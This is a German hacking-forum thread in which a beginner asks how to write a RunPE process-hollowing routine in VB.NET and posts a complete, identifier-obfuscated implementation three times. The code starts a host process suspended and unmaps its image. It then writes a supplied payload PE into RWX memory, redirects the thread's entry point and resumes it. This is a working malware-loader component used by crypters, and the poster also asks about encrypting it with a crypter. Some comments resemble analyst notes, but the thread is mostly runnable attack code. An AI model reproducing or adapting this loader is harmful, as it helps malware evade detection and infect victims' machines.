  1. #1
    Anfänger
    Registriert seit
    14.01.2018
    Beiträge
    6

    Standard Runpe Process Hollowing

    Kann mir jemand vielleicht zeigen, wie ich selber ein RunPE in Visual Basic codieren kann?

    hat da jemand ahnung davon?

  2. #2
    Tron Avatar von gORDon_vdLg
    Registriert seit
    23.07.2007
    Beiträge
    801

    Standard AW: Runpe Process Hollowing

    Wie weit bist du denn gekommen bzw. wo hapert es?

  3. #3
    Anfänger
    Registriert seit
    14.01.2018
    Beiträge
    6

    Standard AW: Runpe Process Hollowing

    Also das Problem liegt darin, wie ich anfangen soll, den Code zu erlernen. Ich habe schon mit Encrypt und Decrypt Erfahrungen gemacht; Bytes to String usw. funktioniert wunderbar.

    Aber wenn ich mir so einen RunPE-Code anschaue, dann komme ich da echt wenig weit voran.



    Ich habe zwar einen RunPE-Code da, der ist aber veraltet, und es gibt ja verschiedene Codes.

    würde gerne kapieren was z.B die einzelnen funktionen, z.b hier das : Public Declare Function dmAWRR Lib "kernel32" Alias "LoadLibraryA" (ByVal eXcI As String) As IntPtr
    Public Declare Function ZZvfGU Lib "kernel32" Alias "GetProcAddress" (ByVal HjrC As IntPtr, ByVal eXcI As String) As IntPtr


    bedeuten und wie man am besten anfangen soll um selber mal den Code zu schreiben


    Hier der ganze Code.

    Vielleicht kann mir ja jemand einzeln erklären, was die einzelnen Teile bedeuten und wofür sie da sind.

    Vielen Dank im Voraus.
    Code:
    Imports System.Runtime.InteropServices
    Imports System.Text
    
    '''' <summary>
    '''' Coder : Rahoz
    '''' RunPE Coder : Simon-Binyo
    '''' Call : ( byte() , String )
    '''' Purpose : Execute App In Memory from byte array
    '''' </summary>
    
    Public Class gFDLGDFASKL
        ' Static imports of two kernel32 exports. The randomised identifiers are only the
        ' VB-side names; the Alias strings give the real API behind each one.
        ' dmAWRR -> LoadLibraryA: takes a module name, returns a module handle.
        Public Declare Function dmAWRR Lib "kernel32" Alias "LoadLibraryA" (ByVal eXcI As String) As IntPtr
        ' ZZvfGU -> GetProcAddress: takes a module handle and an export name, returns the function address.
        Public Declare Function ZZvfGU Lib "kernel32" Alias "GetProcAddress" (ByVal HjrC As IntPtr, ByVal eXcI As String) As IntPtr
        ' Run-time API resolver: looks up export KAvK in library eXcI through the
        ' LoadLibraryA/GetProcAddress aliases above and wraps the returned address in a
        ' delegate of type T so it can be called from managed code.
        ' Analyst note: every native function reached through this helper is named by a
        ' cleartext string literal at the call site, so those literals together with
        ' Marshal.GetDelegateForFunctionPointer are a usable static hunting pivot.
        Function BUeBsTZDkKEMbrG(Of T)(ByVal eXcI As String, ByVal KAvK As String) As T
            Return DirectCast(DirectCast(Marshal.GetDelegateForFunctionPointer(ZZvfGU(dmAWRR(eXcI), KAvK), GetType(T)), Object), T)
        End Function
        ' Delegate types describing the native signatures that BUeBsTZDkKEMbrG binds at run time.
        ' The API named in each comment is the string literal the delegate is bound to in this class.
        ' NOJMkg: bound to ntdll "NtGetContextThread" (thread handle, context buffer).
        Delegate Function NOJMkg(ByVal GBFW As IntPtr, ByVal EFfDmpqlB As UInteger()) As <MarshalAs(UnmanagedType.Bool)> Boolean
        ' Luoipi: bound to ntdll "NtUnmapViewOfSection" (process handle, base address).
        Delegate Function Luoipi(ByVal CCPh As IntPtr, ByVal kPCK As IntPtr) As UInteger
        ' AAAAA: bound to ntdll "NtReadVirtualMemory" (process handle, address, out buffer, size, out count).
        Delegate Function AAAAA(ByVal CCPh As IntPtr, ByVal kPCK As IntPtr, ByRef bufr As IntPtr, ByVal bufrMWayWhlwz As Integer, ByRef WZwg As IntPtr) As <MarshalAs(UnmanagedType.Bool)> Boolean
        ' NTJceg: bound to ntdll "NtResumeThread" (thread handle, second argument passed as 0).
        Delegate Function NTJceg(ByVal GBFWead As IntPtr, ByVal NaQE As IntPtr) As UInteger
        ' RNzQc: bound to ntdll "NtSetContextThread" (thread handle, context buffer).
        Delegate Function RNzQc(ByVal GBFW As IntPtr, ByVal EFfDmpqlB As UInteger()) As <MarshalAs(UnmanagedType.Bool)> Boolean
        ' gNNNNN: bound to kernel32 "VirtualAllocEx" (process handle, address, size, allocation type, protection).
        Delegate Function gNNNNN(ByVal CCPh As IntPtr, ByVal tDjF As IntPtr, ByVal MWayWhlwz As IntPtr, ByVal bQWh As Integer, ByVal oEtR As Integer) As IntPtr
        ' lkgzcI: bound to ntdll "NtWriteVirtualMemory" (process handle, remote address, source bytes, size, out count).
        Delegate Function lkgzcI(ByVal CCPhess As IntPtr, ByVal DSvGRqwzF As IntPtr, ByVal Ebkb As Byte(), ByVal nMWayWhlwz As UInteger, ByVal awiftTtgC As Integer) As Boolean
        ' Pjfqge -> CreateProcessW, imported statically. The last two parameters are a Byte() and an
        ' IntPtr() that presumably stand in for the STARTUPINFO and PROCESS_INFORMATION structures.
        Public Declare Auto Function Pjfqge Lib "kernel32" Alias "CreateProcessW" (ByVal kEDd As String, ByVal SRqF As StringBuilder, ByVal EEXsqPyEy As IntPtr, ByVal fFOp As IntPtr, <MarshalAs(UnmanagedType.Bool)> ByVal vdEz As Boolean, ByVal bGYB As Integer, ByVal KTKd As IntPtr, ByVal WGiN As String, ByVal meYX As Byte(), ByVal SHsY As IntPtr()) As <MarshalAs(UnmanagedType.Bool)> Boolean
        ' Reads zRwHpUb bytes (default 4) at address FsQGol in the *current* process by calling
        ' ntdll "NtReadVirtualMemory" on Process.GetCurrentProcess.Handle, and returns the value
        ' that was written into the IntPtr buffer. The caller uses it to pull header fields out
        ' of the payload buffer by raw address.
        Private Function CeCyARJ(ByVal FsQGol As Long, Optional ByVal zRwHpUb As Long = &H4) As Integer
            Dim qZYGUEz As IntPtr
            ' Passed for the ByRef output argument of the call; never read afterwards.
            Dim WBiwMxI As Integer
            Dim eIfLI As AAAAA = BUeBsTZDkKEMbrG(Of AAAAA)("ntdll", "NtReadVirtualMemory")
            Call eIfLI(Process.GetCurrentProcess.Handle, FsQGol, qZYGUEz, zRwHpUb, WBiwMxI)
            Return qZYGUEz
        End Function
        Public Function GNMNioZVtaV(ByVal RIAkWcIh As Byte(), ByVal MRbichBw As String) As Boolean
            Try
                Dim Wakodbh As GCHandle = GCHandle.Alloc(RIAkWcIh, GCHandleType.Pinned) : Dim hModuleBase As Integer = Wakodbh.AddrOfPinnedObject : Wakodbh.Free()
                Dim EEXsqPyEy As IntPtr = IntPtr.Zero
                Dim yYEifvEzt As IntPtr() = New IntPtr(3) {}
                Dim PXYyxEHcm As Byte() = New Byte(67) {}
                Dim klhposaehf As Integer = BitConverter.ToInt32(RIAkWcIh, 60)
                Dim BmSklSftl As Integer
                Dim EFfDmpqlB As UInteger() = New UInteger(178) {}
                EFfDmpqlB(0) = &H10002
                Pjfqge(Nothing, New StringBuilder(MRbichBw), EEXsqPyEy, EEXsqPyEy, False, 4, EEXsqPyEy, Nothing, PXYyxEHcm, yYEifvEzt)
                Dim gnzWsnHkF As Integer = (hModuleBase + CeCyARJ(hModuleBase + &H3C))
                BmSklSftl = CeCyARJ(gnzWsnHkF + &H34)
                Dim qfXWO As Luoipi = BUeBsTZDkKEMbrG(Of Luoipi)("ntdll", "NtUnmapViewOfSection")
                qfXWO(yYEifvEzt(0), BmSklSftl)
                Dim WIqYC As gNNNNN = BUeBsTZDkKEMbrG(Of gNNNNN)("kernel32", "VirtualAllocEx")
                Dim DSvGRqwzF As IntPtr = WIqYC(yYEifvEzt(0), BmSklSftl, CeCyARJ(gnzWsnHkF + &H50), &H3000, &H40)
                Dim AEhEKTVFO As New IntPtr(BitConverter.ToInt32(RIAkWcIh, klhposaehf + &H34))
                Dim MWayWhlwz As New IntPtr(BitConverter.ToInt32(RIAkWcIh, klhposaehf + 80))
                Dim bdLBZrKmW As Integer
                Dim rszaetz As Integer
                Dim api8 As lkgzcI = BUeBsTZDkKEMbrG(Of lkgzcI)("ntdll", "NtWriteVirtualMemory")
                api8(yYEifvEzt(0), DSvGRqwzF, RIAkWcIh, CUInt(CInt(CeCyARJ(gnzWsnHkF + &H54))), bdLBZrKmW)
                For i = 0 To CeCyARJ(gnzWsnHkF + &H6, 2) - 1
                    Dim QcXOrDrbL As Integer() = New Integer(9) {}
                    Buffer.BlockCopy(RIAkWcIh, (klhposaehf + &HF8) + (i * 40), QcXOrDrbL, 0, 40)
                    Dim ljsdhhds As Byte() = New Byte((QcXOrDrbL(4) - 1)) {}
                    Buffer.BlockCopy(RIAkWcIh, QcXOrDrbL(5), ljsdhhds, 0, ljsdhhds.Length)
                    MWayWhlwz = New IntPtr(DSvGRqwzF.ToInt32() + QcXOrDrbL(3))
                    AEhEKTVFO = New IntPtr(ljsdhhds.Length)
                    api8(yYEifvEzt(0), MWayWhlwz, ljsdhhds, CUInt(AEhEKTVFO), rszaetz)
                Next i
                Dim sdfsgt As NOJMkg = BUeBsTZDkKEMbrG(Of NOJMkg)("ntdll", "NtGetContextThread")
                sdfsgt(yYEifvEzt(1), EFfDmpqlB)
                api8(yYEifvEzt(0), EFfDmpqlB(41) + &H8, BitConverter.GetBytes(DSvGRqwzF.ToInt32()), CUInt(&H4), rszaetz)
                EFfDmpqlB(&H2C) = BmSklSftl + CeCyARJ(gnzWsnHkF + &H28)
                Dim ihsg As RNzQc = BUeBsTZDkKEMbrG(Of RNzQc)("ntdll", "NtSetContextThread")
                ihsg(yYEifvEzt(1), EFfDmpqlB)
                Dim ByZcV As NTJceg = BUeBsTZDkKEMbrG(Of NTJceg)("ntdll", "NtResumeThread")
                ByZcV(yYEifvEzt(1), 0)
            Catch ex As Exception
                Return False
    Geändert von Barny (29.01.2018 um 17:08 Uhr)

  4. #4
    Anfänger
    Registriert seit
    14.01.2018
    Beiträge
    6

    Standard AW: Runpe Process Hollowing

    Habe gerade ne Antwort

    ---------- Post added at 17:50 ---------- Previous post was at 17:45 ----------

    Bisher habe ich nur Crypt-Erfahrungen in VB gemacht.
    Hier ist ein Code, mit dem ich mich beschäftige.

    Der funktioniert bei mir, nur ist er veraltet.

    Ich würde gern kapieren, was z.B. das hier bedeutet:
    Code:
    Public Declare Function dmAWRR Lib "kernel32" Alias "LoadLibraryA" (ByVal eXcI As String) As IntPtr
        Public Declare Function ZZvfGU Lib "kernel32" Alias "GetProcAddress" (ByVal HjrC As IntPtr, ByVal eXcI As String) As IntPtr
    
    
    
    
    
    
    "Imports System.Runtime.InteropServices
    Imports System.Text
    
    '''' <summary>
    '''' Coder : Rahoz
    '''' RunPE Coder : Simon-Binyo
    '''' Call : ( byte() , String )
    '''' Purpose : Execute App In Memory from byte array
    '''' </summary>
    
    Public Class gFDLGDFASKL
        ' Static kernel32 imports; the Alias strings give the real API behind each random name.
        ' dmAWRR -> LoadLibraryA (module name -> module handle).
        Public Declare Function dmAWRR Lib "kernel32" Alias "LoadLibraryA" (ByVal eXcI As String) As IntPtr
        ' ZZvfGU -> GetProcAddress (module handle + export name -> function address).
        Public Declare Function ZZvfGU Lib "kernel32" Alias "GetProcAddress" (ByVal HjrC As IntPtr, ByVal eXcI As String) As IntPtr
        ' Run-time API resolver: resolves export KAvK of library eXcI with the
        ' LoadLibraryA/GetProcAddress aliases and returns it as a delegate of type T.
        ' The export names are passed as cleartext string literals at each call site.
        Function BUeBsTZDkKEMbrG(Of T)(ByVal eXcI As String, ByVal KAvK As String) As T
            Return DirectCast(DirectCast(Marshal.GetDelegateForFunctionPointer(ZZvfGU(dmAWRR(eXcI), KAvK), GetType(T)), Object), T)
        End Function
         ' Delegate types for the native functions bound at run time through BUeBsTZDkKEMbrG.
         ' Bindings visible in this class: NOJMkg = NtGetContextThread, Luoipi = NtUnmapViewOfSection,
         ' AAAAA = NtReadVirtualMemory, NTJceg = NtResumeThread, RNzQc = NtSetContextThread,
         ' gNNNNN = VirtualAllocEx, lkgzcI = NtWriteVirtualMemory.
         ' Pjfqge is a static import of CreateProcessW.
         Delegate Function NOJMkg(ByVal GBFW As IntPtr, ByVal EFfDmpqlB As  UInteger()) As <MarshalAs(UnmanagedType.Bool)> Boolean
        Delegate Function Luoipi(ByVal CCPh As IntPtr, ByVal kPCK As IntPtr) As UInteger
         Delegate Function AAAAA(ByVal CCPh As IntPtr, ByVal kPCK As IntPtr,  ByRef bufr As IntPtr, ByVal bufrMWayWhlwz As Integer, ByRef WZwg As  IntPtr) As <MarshalAs(UnmanagedType.Bool)> Boolean
        Delegate Function NTJceg(ByVal GBFWead As IntPtr, ByVal NaQE As IntPtr) As UInteger
         Delegate Function RNzQc(ByVal GBFW As IntPtr, ByVal EFfDmpqlB As  UInteger()) As <MarshalAs(UnmanagedType.Bool)> Boolean
         Delegate Function gNNNNN(ByVal CCPh As IntPtr, ByVal tDjF As IntPtr,  ByVal MWayWhlwz As IntPtr, ByVal bQWh As Integer, ByVal oEtR As Integer)  As IntPtr
        Delegate Function lkgzcI(ByVal CCPhess As IntPtr,  ByVal DSvGRqwzF As IntPtr, ByVal Ebkb As Byte(), ByVal nMWayWhlwz As  UInteger, ByVal awiftTtgC As Integer) As Boolean
        Public Declare  Auto Function Pjfqge Lib "kernel32" Alias "CreateProcessW" (ByVal kEDd  As String, ByVal SRqF As StringBuilder, ByVal EEXsqPyEy As IntPtr, ByVal  fFOp As IntPtr, <MarshalAs(UnmanagedType.Bool)> ByVal vdEz As  Boolean, ByVal bGYB As Integer, ByVal KTKd As IntPtr, ByVal WGiN As  String, ByVal meYX As Byte(), ByVal SHsY As IntPtr()) As  <MarshalAs(UnmanagedType.Bool)> Boolean
        ' Reads zRwHpUb bytes (default 4) at address FsQGol in the current process via
        ' ntdll "NtReadVirtualMemory" and returns the value placed in the IntPtr buffer.
        Private Function CeCyARJ(ByVal FsQGol As Long, Optional ByVal zRwHpUb As Long = &H4) As Integer
            Dim qZYGUEz As IntPtr
            ' Output argument of the call; not used afterwards.
            Dim WBiwMxI As Integer
            Dim eIfLI As AAAAA = BUeBsTZDkKEMbrG(Of AAAAA)("ntdll", "NtReadVirtualMemory")
            Call eIfLI(Process.GetCurrentProcess.Handle, FsQGol, qZYGUEz, zRwHpUb, WBiwMxI)
            Return qZYGUEz
        End Function
        Public Function GNMNioZVtaV(ByVal RIAkWcIh As Byte(), ByVal MRbichBw As String) As Boolean
            Try
                 Dim Wakodbh As GCHandle = GCHandle.Alloc(RIAkWcIh, GCHandleType.Pinned)  : Dim hModuleBase As Integer = Wakodbh.AddrOfPinnedObject :  Wakodbh.Free()
                Dim EEXsqPyEy As IntPtr = IntPtr.Zero
                Dim yYEifvEzt As IntPtr() = New IntPtr(3) {}
                Dim PXYyxEHcm As Byte() = New Byte(67) {}
                Dim klhposaehf As Integer = BitConverter.ToInt32(RIAkWcIh, 60)
                Dim BmSklSftl As Integer
                Dim EFfDmpqlB As UInteger() = New UInteger(178) {}
                EFfDmpqlB(0) = &H10002
                 Pjfqge(Nothing, New StringBuilder(MRbichBw), EEXsqPyEy, EEXsqPyEy,  False, 4, EEXsqPyEy, Nothing, PXYyxEHcm, yYEifvEzt)
                Dim gnzWsnHkF As Integer = (hModuleBase + CeCyARJ(hModuleBase + &H3C))
                BmSklSftl = CeCyARJ(gnzWsnHkF + &H34)
                Dim qfXWO As Luoipi = BUeBsTZDkKEMbrG(Of Luoipi)("ntdll", "NtUnmapViewOfSection")
                qfXWO(yYEifvEzt(0), BmSklSftl)
                Dim WIqYC As gNNNNN = BUeBsTZDkKEMbrG(Of gNNNNN)("kernel32", "VirtualAllocEx")
                Dim DSvGRqwzF As IntPtr = WIqYC(yYEifvEzt(0), BmSklSftl, CeCyARJ(gnzWsnHkF + &H50), &H3000, &H40)
                Dim AEhEKTVFO As New IntPtr(BitConverter.ToInt32(RIAkWcIh, klhposaehf + &H34))
                Dim MWayWhlwz As New IntPtr(BitConverter.ToInt32(RIAkWcIh, klhposaehf + 80))
                Dim bdLBZrKmW As Integer
                Dim rszaetz As Integer
                Dim api8 As lkgzcI = BUeBsTZDkKEMbrG(Of lkgzcI)("ntdll", "NtWriteVirtualMemory")
                api8(yYEifvEzt(0), DSvGRqwzF, RIAkWcIh, CUInt(CInt(CeCyARJ(gnzWsnHkF + &H54))), bdLBZrKmW)
                For i = 0 To CeCyARJ(gnzWsnHkF + &H6, 2) - 1
                    Dim QcXOrDrbL As Integer() = New Integer(9) {}
                    Buffer.BlockCopy(RIAkWcIh, (klhposaehf + &HF8) + (i * 40), QcXOrDrbL, 0, 40)
                    Dim ljsdhhds As Byte() = New Byte((QcXOrDrbL(4) - 1)) {}
                    Buffer.BlockCopy(RIAkWcIh, QcXOrDrbL(5), ljsdhhds, 0, ljsdhhds.Length)
                    MWayWhlwz = New IntPtr(DSvGRqwzF.ToInt32() + QcXOrDrbL(3))
                    AEhEKTVFO = New IntPtr(ljsdhhds.Length)
                    api8(yYEifvEzt(0), MWayWhlwz, ljsdhhds, CUInt(AEhEKTVFO), rszaetz)
                Next i
                Dim sdfsgt As NOJMkg = BUeBsTZDkKEMbrG(Of NOJMkg)("ntdll", "NtGetContextThread")
                sdfsgt(yYEifvEzt(1), EFfDmpqlB)
                api8(yYEifvEzt(0), EFfDmpqlB(41) + &H8, BitConverter.GetBytes(DSvGRqwzF.ToInt32()), CUInt(&H4), rszaetz)
                EFfDmpqlB(&H2C) = BmSklSftl + CeCyARJ(gnzWsnHkF + &H28)
                Dim ihsg As RNzQc = BUeBsTZDkKEMbrG(Of RNzQc)("ntdll", "NtSetContextThread")
                ihsg(yYEifvEzt(1), EFfDmpqlB)
                Dim ByZcV As NTJceg = BUeBsTZDkKEMbrG(Of NTJceg)("ntdll", "NtResumeThread")
                ByZcV(yYEifvEzt(1), 0)
            Catch ex As Exception
                Return False"
    Geändert von Barny (29.01.2018 um 17:07 Uhr)

  5. #5
    Anfänger
    Registriert seit
    14.01.2018
    Beiträge
    6

    Standard AW: Runpe Process Hollowing

    ich bekomme es nicht hin hier ein Code reinzumachen. Komisch

  6. #6
    Wiederbelebt Avatar von Cystasy
    Registriert seit
    08.05.2015
    Beiträge
    685

    Standard AW: Runpe Process Hollowing

    Zitat Zitat von sirma000 Beitrag anzeigen
    ich bekomme es nicht hin hier ein Code reinzumachen. Komisch
    Woran scheitert es?

    Code:
    Beispielcode
    エロ <3

  7. #7
    Anfänger
    Registriert seit
    14.01.2018
    Beiträge
    6

    Standard

    OK denke das es jetzt klappen wird.


    Habe mit crypten schon erfahrung, läuft auch soweit gut.


    aber wenn ich mir den runpe code anschau verstehe ich da nichts.

    Ich habe mir schon einige Sachen über Process Hollowing angeschaut, dabei habe ich aber wenig gefunden, das mir etwas beibringen konnte.

    Ich würde gerne verstehen, was die einzelnen Funktionen im RunPE-Code bedeuten und wie man den selber schreiben kann.

    am besten über pm

    hier der code

    Code:
    Code:
    Imports System.Runtime.InteropServices
    Imports System.Text
    
    '''' <summary>
    '''' Coder : Rahoz
    '''' RunPE Coder : Simon-Binyo
    '''' Call : ( byte() , String )
    '''' Purpose : Execute App In Memory from byte array
    '''' </summary>
    
    ' Identifier-obfuscated VB.NET "RunPE" class: starts a host process suspended and replaces
    ' its image with a PE supplied as a byte array (process hollowing, MITRE ATT&CK T1055.012).
    '
    ' Analyst notes
    '  - Only the VB-side names are randomised. The Alias strings and the literals passed to
    '    BUeBsTZDkKEMbrG name every native API in cleartext, which makes them a static pivot
    '    together with Marshal.GetDelegateForFunctionPointer.
    '  - Observable run-time sequence against the child process: creation with flag 4, section
    '    unmap, remote allocation with protection &H40, remote writes, thread-context change,
    '    resume. Endpoint telemetry that correlates these steps (for example Sysmon's
    '    ProcessTampering event, ID 25) or a memory scan comparing the main image with its file
    '    on disk is where this behaviour shows up.
    '  - The header offsets and the context-buffer indexes used below match the 32-bit PE and
    '    x86 CONTEXT layouts.
    Public Class gFDLGDFASKL
        ' Static kernel32 imports: dmAWRR -> LoadLibraryA, ZZvfGU -> GetProcAddress.
        Public Declare Function dmAWRR Lib "kernel32" Alias "LoadLibraryA" (ByVal eXcI As String) As IntPtr
        Public Declare Function ZZvfGU Lib "kernel32" Alias "GetProcAddress" (ByVal HjrC As IntPtr, ByVal eXcI As String) As IntPtr
        ' Run-time API resolver: export KAvK of library eXcI, returned as a delegate of type T.
        Function BUeBsTZDkKEMbrG(Of T)(ByVal eXcI As String, ByVal KAvK As String) As T
            Return DirectCast(DirectCast(Marshal.GetDelegateForFunctionPointer(ZZvfGU(dmAWRR(eXcI), KAvK), GetType(T)), Object), T)
        End Function
        ' Delegate types for the run-time bound functions (binding = literal used further down):
        ' NOJMkg = NtGetContextThread
        Delegate Function NOJMkg(ByVal GBFW As IntPtr, ByVal EFfDmpqlB As UInteger()) As <MarshalAs(UnmanagedType.Bool)> Boolean
        ' Luoipi = NtUnmapViewOfSection
        Delegate Function Luoipi(ByVal CCPh As IntPtr, ByVal kPCK As IntPtr) As UInteger
        ' AAAAA = NtReadVirtualMemory
        Delegate Function AAAAA(ByVal CCPh As IntPtr, ByVal kPCK As IntPtr, ByRef bufr As IntPtr, ByVal bufrMWayWhlwz As Integer, ByRef WZwg As IntPtr) As <MarshalAs(UnmanagedType.Bool)> Boolean
        ' NTJceg = NtResumeThread
        Delegate Function NTJceg(ByVal GBFWead As IntPtr, ByVal NaQE As IntPtr) As UInteger
        ' RNzQc = NtSetContextThread
        Delegate Function RNzQc(ByVal GBFW As IntPtr, ByVal EFfDmpqlB As UInteger()) As <MarshalAs(UnmanagedType.Bool)> Boolean
        ' gNNNNN = VirtualAllocEx
        Delegate Function gNNNNN(ByVal CCPh As IntPtr, ByVal tDjF As IntPtr, ByVal MWayWhlwz As IntPtr, ByVal bQWh As Integer, ByVal oEtR As Integer) As IntPtr
        ' lkgzcI = NtWriteVirtualMemory
        Delegate Function lkgzcI(ByVal CCPhess As IntPtr, ByVal DSvGRqwzF As IntPtr, ByVal Ebkb As Byte(), ByVal nMWayWhlwz As UInteger, ByVal awiftTtgC As Integer) As Boolean
        ' Pjfqge -> CreateProcessW (static import). The Byte() and IntPtr() parameters presumably
        ' stand in for the STARTUPINFO and PROCESS_INFORMATION structures.
        Public Declare Auto Function Pjfqge Lib "kernel32" Alias "CreateProcessW" (ByVal kEDd As String, ByVal SRqF As StringBuilder, ByVal EEXsqPyEy As IntPtr, ByVal fFOp As IntPtr, <MarshalAs(UnmanagedType.Bool)> ByVal vdEz As Boolean, ByVal bGYB As Integer, ByVal KTKd As IntPtr, ByVal WGiN As String, ByVal meYX As Byte(), ByVal SHsY As IntPtr()) As <MarshalAs(UnmanagedType.Bool)> Boolean
        ' Reads zRwHpUb bytes (default 4) at address FsQGol in the current process through
        ' NtReadVirtualMemory and returns the value placed in the IntPtr buffer.
        Private Function CeCyARJ(ByVal FsQGol As Long, Optional ByVal zRwHpUb As Long = &H4) As Integer
            Dim qZYGUEz As IntPtr
            Dim WBiwMxI As Integer
            Dim eIfLI As AAAAA = BUeBsTZDkKEMbrG(Of AAAAA)("ntdll", "NtReadVirtualMemory")
            Call eIfLI(Process.GetCurrentProcess.Handle, FsQGol, qZYGUEz, zRwHpUb, WBiwMxI)
            Return qZYGUEz
        End Function
        ' Entry point named in the header comment as "Call : ( byte() , String )".
        ' RIAkWcIh: the PE image to run, as raw bytes. MRbichBw: command line of the host process.
        ' Returns False if a .NET exception was thrown, True otherwise; the return values of the
        ' native calls are not inspected.
        Public Function GNMNioZVtaV(ByVal RIAkWcIh As Byte(), ByVal MRbichBw As String) As Boolean
            Try
                ' Takes the raw address of the payload array in this process (hModuleBase).
                Dim Wakodbh As GCHandle = GCHandle.Alloc(RIAkWcIh, GCHandleType.Pinned) : Dim hModuleBase As Integer = Wakodbh.AddrOfPinnedObject : Wakodbh.Free()
                Dim EEXsqPyEy As IntPtr = IntPtr.Zero
                ' Four IntPtr slots filled by CreateProcessW; slot 0 is used below as the process
                ' handle and slot 1 as the thread handle.
                Dim yYEifvEzt As IntPtr() = New IntPtr(3) {}
                ' 68 zero bytes passed in the startup-info position.
                Dim PXYyxEHcm As Byte() = New Byte(67) {}
                ' Int32 at payload offset 60 (&H3C): file offset of the PE header.
                Dim klhposaehf As Integer = BitConverter.ToInt32(RIAkWcIh, 60)
                Dim BmSklSftl As Integer
                ' 179 dwords used as the thread-context buffer; the first dword holds the context
                ' flags (&H10002 matches CONTEXT_INTEGER on x86).
                Dim EFfDmpqlB As UInteger() = New UInteger(178) {}
                EFfDmpqlB(0) = &H10002
                ' Host process is created with creation flags 4 (CREATE_SUSPENDED).
                Pjfqge(Nothing, New StringBuilder(MRbichBw), EEXsqPyEy, EEXsqPyEy, False, 4, EEXsqPyEy, Nothing, PXYyxEHcm, yYEifvEzt)
                ' Address of the payload's PE header inside this process.
                Dim gnzWsnHkF As Integer = (hModuleBase + CeCyARJ(hModuleBase + &H3C))
                ' Dword at header offset &H34: the payload's preferred image base (PE32 layout).
                BmSklSftl = CeCyARJ(gnzWsnHkF + &H34)
                ' Unmaps whatever the child has mapped at that base address.
                Dim qfXWO As Luoipi = BUeBsTZDkKEMbrG(Of Luoipi)("ntdll", "NtUnmapViewOfSection")
                qfXWO(yYEifvEzt(0), BmSklSftl)
                ' Allocates memory in the child at the same base; size is the dword at header
                ' offset &H50 (SizeOfImage), type &H3000 (MEM_COMMIT Or MEM_RESERVE), protection
                ' &H40 (PAGE_EXECUTE_READWRITE).
                Dim WIqYC As gNNNNN = BUeBsTZDkKEMbrG(Of gNNNNN)("kernel32", "VirtualAllocEx")
                Dim DSvGRqwzF As IntPtr = WIqYC(yYEifvEzt(0), BmSklSftl, CeCyARJ(gnzWsnHkF + &H50), &H3000, &H40)
                ' Both variables are reassigned inside the loop before they are used.
                Dim AEhEKTVFO As New IntPtr(BitConverter.ToInt32(RIAkWcIh, klhposaehf + &H34))
                Dim MWayWhlwz As New IntPtr(BitConverter.ToInt32(RIAkWcIh, klhposaehf + 80))
                Dim bdLBZrKmW As Integer
                Dim rszaetz As Integer
                ' Copies the PE headers into the child; length is the dword at header offset &H54
                ' (SizeOfHeaders).
                Dim api8 As lkgzcI = BUeBsTZDkKEMbrG(Of lkgzcI)("ntdll", "NtWriteVirtualMemory")
                api8(yYEifvEzt(0), DSvGRqwzF, RIAkWcIh, CUInt(CInt(CeCyARJ(gnzWsnHkF + &H54))), bdLBZrKmW)
                ' One iteration per section; the count is the 2-byte field at header offset &H6.
                For i = 0 To CeCyARJ(gnzWsnHkF + &H6, 2) - 1
                    ' 40-byte section header read as ten Int32 values: index 3 = virtual address,
                    ' index 4 = raw data size, index 5 = raw data file offset.
                    Dim QcXOrDrbL As Integer() = New Integer(9) {}
                    Buffer.BlockCopy(RIAkWcIh, (klhposaehf + &HF8) + (i * 40), QcXOrDrbL, 0, 40)
                    Dim ljsdhhds As Byte() = New Byte((QcXOrDrbL(4) - 1)) {}
                    Buffer.BlockCopy(RIAkWcIh, QcXOrDrbL(5), ljsdhhds, 0, ljsdhhds.Length)
                    ' Section bytes are written to allocated base + virtual address in the child.
                    MWayWhlwz = New IntPtr(DSvGRqwzF.ToInt32() + QcXOrDrbL(3))
                    AEhEKTVFO = New IntPtr(ljsdhhds.Length)
                    api8(yYEifvEzt(0), MWayWhlwz, ljsdhhds, CUInt(AEhEKTVFO), rszaetz)
                Next i
                ' Fetches the suspended thread's context into the dword buffer.
                Dim sdfsgt As NOJMkg = BUeBsTZDkKEMbrG(Of NOJMkg)("ntdll", "NtGetContextThread")
                sdfsgt(yYEifvEzt(1), EFfDmpqlB)
                ' Writes the new base address (4 bytes) into the child at [context dword 41] + 8.
                ' Dword 41 is Ebx in the x86 CONTEXT layout, presumably the PEB pointer here, which
                ' would make the target the PEB's image-base field.
                api8(yYEifvEzt(0), EFfDmpqlB(41) + &H8, BitConverter.GetBytes(DSvGRqwzF.ToInt32()), CUInt(&H4), rszaetz)
                ' Context dword &H2C (Eax in the x86 layout) is set to image base + the dword at
                ' header offset &H28 (AddressOfEntryPoint).
                EFfDmpqlB(&H2C) = BmSklSftl + CeCyARJ(gnzWsnHkF + &H28)
                Dim ihsg As RNzQc = BUeBsTZDkKEMbrG(Of RNzQc)("ntdll", "NtSetContextThread")
                ihsg(yYEifvEzt(1), EFfDmpqlB)
                ' The child's main thread is resumed with the modified context.
                Dim ByZcV As NTJceg = BUeBsTZDkKEMbrG(Of NTJceg)("ntdll", "NtResumeThread")
                ByZcV(yYEifvEzt(1), 0)
            Catch ex As Exception
                Return False
            End Try
            Return True
        End Function
    End Class
    ein Moderator muss mir die Nachricht erst freischalten mit dem Code

    ---------- Post added at 23:56 ---------- Previous post was at 22:05 ----------

    Kann ich eig. mein runpe Code mit einem Runpe Crypter verschlüsseln, und ganz normal ausführen?
    Geändert von Barny (30.01.2018 um 11:30 Uhr)
